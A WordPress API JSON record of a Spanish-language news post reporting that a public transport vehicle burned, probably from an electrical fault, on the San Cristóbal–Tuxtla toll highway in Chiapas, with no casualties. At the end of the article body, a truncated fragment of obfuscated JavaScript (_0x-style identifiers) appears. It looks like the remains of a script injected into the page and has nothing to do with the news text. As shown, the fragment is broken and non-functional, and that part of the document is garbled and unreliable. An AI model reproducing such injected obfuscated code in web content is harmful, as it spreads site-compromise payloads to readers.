{"id":23196,"date":"2025-07-28T02:17:11","date_gmt":"2025-07-28T02:17:11","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=23196"},"modified":"2025-07-28T02:17:11","modified_gmt":"2025-07-28T02:17:11","slug":"se-incendia-vehiculo-del-transporte-publico-en-la-carretera-de-cuota-san-cristobal-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=23196","title":{"rendered":"Se incendia veh\u00edculo del transporte p\u00fablico en la carretera de cuota San Crist\u00f3bal\u2013Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"667\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000247676-1024x667.jpg\" alt=\"\" class=\"wp-image-23197\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000247676-1024x667.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000247676-300x195.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000247676-768x500.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000247676-1536x1000.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000247676.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>YolandaRodr\u00edguez\/ corresponsal<\/p>\n\n\n\n<p>27 de julio del 2025. San Crist\u00f3bal de Las Casas.- La ma\u00f1ana de este domingo, un veh\u00edculo del transporte p\u00fablico se incendi\u00f3 sobre la carretera de cuota San Crist\u00f3bal\u2013Tuxtla Guti\u00e9rrez, a la altura del kil\u00f3metro 25. De acuerdo con los primeros reportes, una posible falla el\u00e9ctrica habr\u00eda originado el siniestro, provocando que la unidad fuera consumida r\u00e1pidamente por las llamas.<\/p>\n\n\n\n<p>Afortunadamente, no se reportan p\u00e9rdidas humanas, ya que tanto el conductor como los pasajeros lograron descender de la unidad a tiempo. Solo se registraron da\u00f1os materiales. Al lugar acudieron cuerpos de emergencia para sofocar el fuego y brindar apoyo. Las autoridades correspondientes ya investigan el hecho para determinar las causas exactas del incendio.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>YolandaRodr\u00edguez\/ corresponsal 27 de julio del 2025. San Crist\u00f3bal de Las Casas.- La ma\u00f1ana de este domingo, un veh\u00edculo del transporte p\u00fablico se incendi\u00f3 sobre la carretera de cuota San Crist\u00f3bal\u2013Tuxtla Guti\u00e9rrez, a la altura del kil\u00f3metro 25. De acuerdo con los primeros reportes, una posible falla el\u00e9ctrica habr\u00eda originado el siniestro, provocando que la &hellip;<\/p>\n","protected":false},"author":2,"featured_media":23197,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-23196","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23196","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=23196"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23196\/revisions"}],"predecessor-version":[{"id":23198,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23196\/revisions\/23198"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/23197"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=23196"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=23196"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=23196"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}